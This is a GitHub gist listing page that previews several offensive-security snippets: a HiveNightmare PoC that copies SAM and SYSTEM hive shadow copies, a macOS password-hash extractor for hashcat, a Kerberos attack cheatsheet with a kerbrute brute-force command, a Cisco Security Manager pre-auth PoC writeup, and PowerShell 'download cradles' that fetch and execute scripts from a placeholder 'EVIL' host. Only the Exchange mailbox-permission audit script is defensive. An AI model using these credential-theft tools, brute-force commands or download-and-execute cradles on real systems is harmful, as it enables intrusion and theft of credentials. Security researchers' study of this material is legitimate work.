Skip to content

Instantly share code, notes, and snippets.

View dunderhay's full-sized avatar

Daniel Underhay dunderhay

63 followers · 53 following
View GitHub Profile
@LuemmelSec
LuemmelSec / Get-AppsWithFull_acces_as_appRole.ps1
Last active February 16, 2024 04:16
Check for Apps that can read all user mailboxes and have no restricting access policy
# PowerShell Script to check which Apps have the "full_acces_as_app" EWS role, so can read all Mailboxes
# There might be ApplicationAccessPolicies in place that afterwards restrict access to only certain mailboxes, so criticality would be reduced
# This is reflected in the output as well.
# This was written for PowerShell 7 - to work with PS v5 you need to exchange some modules and calls
# Check if ExchangeOnlineManagement module is available
$ExchangeOnlineModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
# Check if Az.Accounts module is available
$AzAccountsModule = Get-Module -Name Az.Accounts -ListAvailable
@reigningshells
reigningshells / Invoke-HiveNightmare.ps1
Last active February 7, 2024 20:47
Super simple PowerShell PoC for HiveNightmare / SeriousSam that copies SAM and SYSTEM hive shadow copies to C:\Users\Public\Documents
function Invoke-HiveNightmare
{
if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access | where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "*Read*")}).Count -gt 0)
{
Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam"
}
else
{
Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies"
}
@Frycos
Frycos / CSM_pocs.md
Created November 16, 2020 18:55

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@teddziuba
teddziuba / osx_extract_hash.py
Last active May 1, 2024 16:53
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
#!/usr/bin/env python3
"""
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active September 16, 2024 18:36
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object